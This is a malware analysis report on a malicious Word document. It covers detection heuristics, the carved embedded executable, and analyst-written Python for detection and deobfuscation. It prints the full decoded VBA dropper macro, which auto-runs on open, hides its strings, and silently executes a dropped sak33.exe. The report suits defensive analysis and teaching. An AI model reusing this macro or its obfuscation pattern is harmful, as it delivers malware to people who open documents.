Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8460de1ab04bca45…

MALICIOUS

Office (OLE)

Size: 160.0 KB | Created: 2016-02-11 08:57:00 | Authoring application: Microsoft Office Word | First seen: 2016-02-27
MD5: 37bfb90c5f3edf98334214e08d67415b | SHA-1: 53d7b96793fbdb94717fbced7b7ffd5be2366542 | SHA-256: 8460de1ab04bca45600642c72d23a71ba35e5504c6c07cfdb5c8da534dfcc621
Risk score: 634

Heuristics (17)

  • ClamAV: BC.Win.Packer.Troll-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    weq = Shell(tytg, 0)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
    Decoded: LosPada() is a Chr() wrapper (see macros.bas below), so LosPada(23 + 64) is "W" and the reconstructed ProgID is "Word.Application".
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    DGSAHW = Environ(ROONWQ) + BGEVQWE
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the VBA project was in fact recovered (macros.bas below, with Sub AutoOpen), so the marker is most likely that VBA entry point rather than a separate WordBasic macro; treat this finding as redundant with OLE_VBA_AUTOOPEN.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace that Office writes into documents containing drawing objects; it is not a contacted host and not an indicator.
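The pairing rule described under OLE_VBA_PCODE_AUTOEXEC_EXEC, as an added Python example (it is not the scanner's implementation): the two token lists the description names are run over whatever text was recovered from a stream, and the matched tokens come back as the content of the detail line. The sample streams are constructed: a condensed version of this sample's macro, a p-code-style identifier listing, and the single-class cases the rule must stay silent on.

```python
# Added example, not the scanner's rule code: the OLE_VBA_PCODE_AUTOEXEC_EXEC
# pairing as a function over whatever text was recovered from a VBA stream
# (source or a p-code disassembly listing), with the negatives it must ignore.
import re

# The two token classes named in the heuristic description.
AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "Auto_Close", "AutoClose")
EXEC = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
        "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
        "ShellExecute", "ExecuteExcel4Macro")


def hits(tokens, stream):
    """Tokens present as whole identifiers, case-insensitively (p-code dumps
    may lower-case names). Both sides must be non-identifier characters, so
    'PowerShell' and 'ShellExecute' do not also count as 'Shell'."""
    return [t for t in tokens
            if re.search(r"(?<![\w.])" + re.escape(t) + r"(?![\w.])", stream, re.I)]


def pcode_autoexec_exec(stream):
    """Fire only when an auto-exec entry point AND an execution token co-occur
    in the same stream. Returns the matched tokens (the detail line), or None
    when either class is absent."""
    auto, execs = hits(AUTOEXEC, stream), hits(EXEC, stream)
    return {"autoexec": auto, "exec": execs} if auto and execs else None


# Constructed samples: the gist of macros.bas from this report, a p-code-style
# identifier listing, and the single-class negatives a pairing rule ignores.
STREAMS = {
    "this_sample": 'Sub AutoOpen()\n HuebqSwq\nEnd Sub\n'
                   'Sub Workbook_Open()\n YhbeGwql\nEnd Sub\n'
                   'Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o")\n'
                   'weq = Shell(tytg, 0)\n',
    "pcode_listing": "Identifiers: auto_open Ld x ArgsCall URLDownloadToFile 0x0005",
    "autoexec_only": 'Sub Document_Open()\n MsgBox "hello"\nEnd Sub\n',
    "exec_only": 'Sub Button1_Click()\n Shell "calc.exe", 1\nEnd Sub\n',
    "powershell_not_shell": 'Sub AutoClose()\n c = "PowerShell -nop -w hidden"\nEnd Sub\n',
}


def triage(streams=STREAMS):
    return {name: pcode_autoexec_exec(text) for name, text in streams.items()}
```

Token boundaries are what make the detail line trustworthy: without them "PowerShell" and "ShellExecute" would also be reported as "Shell", and without re.I a p-code listing that lower-cases identifiers would be missed entirely.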

Extracted artifacts (4)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1987 bytes
SHA-256: 280c1950cf233135c61ecc0d84e3ce5218e92927d9ff9faffbc9ef5abb20d50b
Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub HuebqSwq()
    YhbeGwql
End Sub
Sub YhbeGwql()
Dim fdaa As Integer
Dim QQNCC As String
TYQGUWD = DatePart("yyyy", "10/11/7181")
TYQGUWD = Left(TYQGUWD, 1)
ROONWQ = "EM"
fdaa = CInt(TYQGUWD) - 8
On Error Resume Next
BGEVQWE = Left("\2131\", 1)
ROONWQ = "T" & ROONWQ + "P"
DGSAHW = Environ(ROONWQ) + BGEVQWE
RTQCDW = Chr(46)
TYQW = RTQCDW + Chr(96 + 6 + fdaa)
TYQW = TYQW & "x" + Chr(90 + 11)
JNBBH = RTQCDW & LosPada(118 - 4) & LosPada(6 + 0 + 110) & "f"

TTTDADSS = DGSAHW + "jehjs" + JNBBH
RRTFDASD = DGSAHW + "kahjsd" + JNBBH
QQNCC = DGSAHW + "sak33" & TYQW & ""

ERdsa (TTTDADSS)
ERdsa (RRTFDASD)
Module1.Simana (2)
RFQGHVD = ";lk1klen abjksdhkashdjkas"
Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
vvGGVgwvF.Visible = False
vvGGVgwvF.Documents.Open (TTTDADSS)
Module1.Simana (2)
HYUASGD = Module1.Felate(QQNCC)
Module1.Simana (2)
vvGGVgwvF.Quit
Set vvGGVgwvF = Nothing
End Sub
Public Function LosPada(ande As Integer)
    LosPada = Chr(ande)
End Function
Sub Workbook_Open()
    YhbeGwql
End Sub
Sub AutoOpen()
    NFYEUQ = "12ke;lk1;2 ek1;l2je 2l1kh ej12"
    HuebqSwq
End Sub
Public Function ERdsa(fjue As String)
    ActiveDocument.SaveAs FileName:=fjue, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    YhbeGwql
End Sub
Attribute VB_Name = "Module1"
Sub Simana(Sola As Long)
Dim Mone As Long
Dim Oijeq As Long
BFHJQ = "';lqwhdjk qwh dlkqdhkqwjqwgdhjqw dj"
Oijeq = Sola + Timer
Mone = Oijeq
Do While Timer < Mone
DoEvents
Loop
End Sub
Public Function Felate(tytg As String)
Dim weq As Variant
weq = Shell(tytg, 0)
End Function
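Working the string building in YhbeGwql() through by hand: DatePart("yyyy", "10/11/7181") is 7181 and Left(..., 1) is "7", so fdaa is -1 and Chr(96 + 6 + fdaa) is "e"; ROONWQ becomes "TEMP", DGSAHW is %TEMP%\, TYQW is ".exe" and JNBBH is ".rtf". The macro therefore saves the open document as RTF to %TEMP%\jehjs.rtf and %TEMP%\kahjsd.rtf, opens the first copy in a hidden second Word instance, waits about two seconds at each step (Module1.Simana), and finally runs %TEMP%\sak33.exe hidden through Module1.Felate, which is Shell(path, 0). That filename is exactly the full_path recorded in the Ole10Native package below, so the RTF round-trip is the step that gets the embedded Package object written to disk under its stored name before it is executed; that is an inference from the two artifacts, not something the static report observes directly. None of the literal strings "TEMP", ".exe", "Word.Application" or "sak33.exe" occur in the macro source, which is the shape the obfuscated-loader heuristic above describes.

The following Python, added here and not part of the report's tooling, performs that resolution mechanically: a small evaluator for the VBA string-building subset (Chr, Left, CInt, DatePart, Environ, "+" and "&" with VBA precedence) runs the straight-line assignments and records what reaches each sink. FAKE_ENV is an assumed victim environment whose TEMP value is taken from the package's full_path; WRAPPERS is the analyst's reading of macros.bas (LosPada is Chr, ERdsa is SaveAs as RTF, Module1.Felate is Shell), and the Word object's variable name in it is specific to this sample.

```python
# Added example for this report (not analysis-tool code): a small VBA expression
# evaluator that resolves the Chr()/Left()/Environ() string building in the
# carved macro and records every fully resolved value that reaches a sink.
import re

FAKE_ENV = {"TEMP": r"C:\Users\M\AppData\Local\Temp"}  # assumed victim environment
# Wrapper map read off macros.bas: LosPada() is Chr(), ERdsa() is
# ActiveDocument.SaveAs(..., wdFormatRTF), Module1.Felate() is Shell(x, 0).
WRAPPERS = {"LosPada": "Chr", "ERdsa": "SaveAs(RTF)", "Module1.Felate": "Shell",
            "vvGGVgwvF.Documents.Open": "Documents.Open"}
SINKS = {"CreateObject", "Shell", "SaveAs(RTF)", "Documents.Open"}
TOKEN = re.compile(r'("(?:[^"]|"")*")|(\d+)|([A-Za-z_][\w.]*)|([-+&(),])|(\S)')
ASSIGN = re.compile(r'^(?:Set\s+)?([\w.]+)\s*=\s*(.+)$')

class Unresolved(Exception):
    pass

def tokenize(src):
    out = []
    for s, n, ident, op, bad in TOKEN.findall(src):
        if bad:  # anything outside the string-building subset (e.g. ':=', '<')
            raise Unresolved(bad)
        out.append(("str", s[1:-1].replace('""', '"')) if s else
                   ("num", int(n)) if n else ("id", ident) if ident else ("op", op))
    return out

class Resolver:
    LEVELS = (("&",), ("+", "-"))  # VBA: '&' binds looser than '+' and '-'
    def __init__(self, env):
        self.vars, self.env, self.calls = {}, env, []
    def call(self, name, args):
        name = WRAPPERS.get(name, name)
        if name == "Chr": return chr(int(args[0]))
        if name == "Left": return str(args[0])[:int(args[1])]  # number -> text as VBA
        if name == "CInt": return int(args[0])
        if name == "Environ": return self.env[str(args[0])]
        if name == "DatePart" and str(args[0]).lower() == "yyyy":
            return int(str(args[1]).split("/")[-1])  # "m/d/yyyy" literals only
        if name in SINKS:  # record the resolved argument(s) and keep going
            self.calls.append((name, [str(a) for a in args]))
            return "<%s>" % name
        raise Unresolved(name)
    def expr(self, t, level=0):  # binary operators, one precedence level at a time
        sub = (lambda: self.expr(t, 1)) if level == 0 else (lambda: self.primary(t))
        v = sub()
        while t and t[0][0] == "op" and t[0][1] in self.LEVELS[level]:
            op, r = t.pop(0)[1], sub()
            if op != "&" and isinstance(v, int) and isinstance(r, int):
                v = v + r if op == "+" else v - r
            elif op == "-": raise Unresolved(op)  # '-' on text: not modelled
            else:  # '&', and '+' on strings, both concatenate
                v = str(v) + str(r)
        return v
    def primary(self, t):  # STRING | NUMBER | IDENT | IDENT '(' args ')'
        kind, val = t.pop(0)
        if kind in ("str", "num"):
            return val
        if t and t[0] == ("op", "("):
            t.pop(0)
            args = [self.expr(t)] if t[0] != ("op", ")") else []
            while t.pop(0) == ("op", ","):
                args.append(self.expr(t))
            return self.call(val, args)
        if val in self.vars: return self.vars[val]
        raise Unresolved(val)
    def run(self, source):
        for line in (raw.strip() for raw in source.splitlines()):
            try:
                m = ASSIGN.match(line)
                if m:
                    self.vars[m.group(1)] = self.expr(tokenize(m.group(2)))
                elif "(" in line:  # bare procedure-call statement
                    self.expr(tokenize(line))
            except (Unresolved, KeyError, IndexError, ValueError):
                pass  # Dim, loops, parameters, objects: not resolvable statically
        return self.calls

# Excerpt of YhbeGwql() from macros.bas above, in its original order.
MACRO = r'''TYQGUWD = DatePart("yyyy", "10/11/7181")
TYQGUWD = Left(TYQGUWD, 1)
ROONWQ = "EM"
fdaa = CInt(TYQGUWD) - 8
BGEVQWE = Left("\2131\", 1)
ROONWQ = "T" & ROONWQ + "P"
DGSAHW = Environ(ROONWQ) + BGEVQWE
RTQCDW = Chr(46)
TYQW = RTQCDW + Chr(96 + 6 + fdaa)
TYQW = TYQW & "x" + Chr(90 + 11)
JNBBH = RTQCDW & LosPada(118 - 4) & LosPada(6 + 0 + 110) & "f"
TTTDADSS = DGSAHW + "jehjs" + JNBBH
QQNCC = DGSAHW + "sak33" & TYQW & ""
ERdsa (TTTDADSS)
Set vvGGVgwvF = CreateObject(LosPada(23 + 64) & "o" + "rd" + ".A" & "pplication")
vvGGVgwvF.Documents.Open (TTTDADSS)
HYUASGD = Module1.Felate(QQNCC)'''

def resolve_macro(source=MACRO, env=FAKE_ENV):
    return Resolver(env).run(source)
```

resolve_macro() returns the sinks in program order: SaveAs(RTF) with the jehjs.rtf path, CreateObject("Word.Application"), Documents.Open on the same RTF, and Shell on %TEMP%\sak33.exe. Lines the evaluator cannot resolve are skipped rather than guessed, which is the right failure mode for evidence: an emulator that invents values for unresolved variables produces indicators that are not in the sample.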
embedded_office_00006252.exe | embedded-pe | Office MZ+PE at offset 0x6252 | 138670 bytes
SHA-256: 46ab663155bee99e15961c87c37d971a887ed2a4644ccc180f7c6dcb6aba7ce9
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1516721455/Ole10Native | 115928 bytes
SHA-256: ed2826de31a3c28ecc1ec2f309a09d37ece7392d53c69f652cb3e066f53fdad1
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved artifact entropy is 7.54, consistent with packed or encrypted content.
ole10native_00_sak33.exe | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1516721455/Ole10Native; display_name=; full_path=C:\Users\M\AppData\Local\Temp\sak33.exe; temp_path=; def_file= | 115712 bytes
SHA-256: 21bb2fe8321ddc54e6e7505df503fdeecdaeeb77adda47c4e1229bfb0e6ff7e3
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved artifact entropy is 7.54, consistent with packed or encrypted content.
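The Ole10Native package parsing and the checks behind OLE_EMBEDDED_EXE, OFFICE_PACKAGE_RISKY_FILE and the entropy line, as an added Python example that is not the scanner's code. The field layout is the one oletools' OleNativeStream reader walks (size, flags, label, source path, two 32-bit words, temp path, data size, data), assumed here; the sample stream is constructed to mirror the sak33.exe package above, with an empty display name and temp path, the full_path set, and a stub PE whose body is PRNG filler so that it shows the high entropy the report notes without carrying the real 115712-byte payload.

```python
# Added example, not the scanner's code: build and parse an Ole10Native
# (OLE Packager) stream and apply the three checks this report runs on the
# package: an auto-run extension on any of its name fields, an MZ/PE header at
# the start of the payload, and payload entropy. The field layout is the one
# oletools' OleNativeStream parser reads (assumed here); the sample stream is
# constructed to mirror the sak33.exe package above: empty display name and
# temp path, full_path set, and a stub PE whose body is PRNG filler.
import math
import random
import struct
from collections import Counter

# Extensions the default shell runs directly on double-click (assumed list).
RISKY_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
             ".js", ".jse", ".wsf", ".wsh", ".hta")


def build_ole10native(label, src_path, temp_path, payload, flags=2):
    """u32 size | u16 flags | label\\0 | src_path\\0 | u32 (0) | u32 temp-path
    length incl. NUL | temp_path\\0 | u32 data size | data."""
    lbl, src, tmp = (s.encode("latin-1") + b"\0" for s in (label, src_path, temp_path))
    body = (struct.pack("<H", flags) + lbl + src + struct.pack("<II", 0, len(tmp))
            + tmp + struct.pack("<I", len(payload)) + payload)
    return struct.pack("<I", len(body)) + body


def _cstr(buf, pos):
    end = buf.index(b"\0", pos)
    return buf[pos:end].decode("latin-1"), end + 1


def parse_ole10native(stream):
    """Return the three attacker-controlled name fields and the payload;
    raise on a stream shorter than its own size fields claim."""
    size, flags = struct.unpack_from("<IH", stream, 0)
    if len(stream) - 4 < size:
        raise ValueError("truncated Ole10Native stream")
    label, pos = _cstr(stream, 6)
    src_path, pos = _cstr(stream, pos)
    temp_path, pos = _cstr(stream, pos + 8)  # skip the two u32 words
    (data_len,) = struct.unpack_from("<I", stream, pos)
    payload = stream[pos + 4:pos + 4 + data_len]
    if len(payload) != data_len:
        raise ValueError("payload shorter than its declared size")
    return {"flags": flags, "label": label, "src_path": src_path,
            "temp_path": temp_path, "payload": payload}


def risky_names(info):
    """OFFICE_PACKAGE_RISKY_FILE: check every name field, because a dropper can
    leave the display name blank and carry the .exe only in full_path."""
    names = (info["label"], info["src_path"], info["temp_path"])
    return [n for n in names if n.lower().endswith(RISKY_EXT)]


def is_pe(data):
    """OLE_EMBEDDED_EXE: 'MZ' at 0 and 'PE\\0\\0' at the e_lfanew offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def entropy(data):
    """Shannon entropy in bits per byte; values around 7.5 and above are what
    the report calls 'consistent with packed or encrypted content'."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def stub_pe(size=4096, seed=1):
    """Constructed payload: valid MZ/PE headers, then deterministic PRNG bytes
    standing in for a packed section body."""
    hdr = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40) + b"PE\0\0"
    rng = random.Random(seed)
    return hdr + bytes(rng.getrandbits(8) for _ in range(size - len(hdr)))


def triage_package(stream):
    info = parse_ole10native(stream)
    info["risky_names"] = risky_names(info)
    info["is_pe"] = is_pe(info["payload"])
    info["entropy"] = round(entropy(info["payload"]), 2)
    return info


SAMPLE = build_ole10native("", r"C:\Users\M\AppData\Local\Temp\sak33.exe", "", stub_pe())
```

The point to carry into a rule is the one this sample illustrates: check all three name fields, not only the display name. Here display_name and temp_path are empty and the .exe is visible only in full_path; a check keyed on the label alone would have missed it.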